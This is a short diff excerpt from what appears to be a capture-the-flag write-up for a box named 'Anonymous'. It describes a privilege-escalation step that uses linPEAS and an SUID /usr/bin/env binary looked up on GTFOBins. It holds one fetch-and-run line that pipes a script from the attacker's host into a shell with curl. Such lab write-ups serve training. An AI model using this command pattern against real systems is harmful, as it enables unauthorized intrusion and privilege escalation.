Darjusch/Public-Writeups/Anonymous.md

 curl http://your_ip:8000/linpeas.sh | sh you can get linpeas.sh and execute it.

-(Of course you need to download it first https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/linPEAS)
+(Of course you need to download it first on your hostmachie https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/linPEAS)

 We find that /usr/bin/env has the SUID binary bit set so we can check that on GTFOBINs (https://gtfobins.github.io/)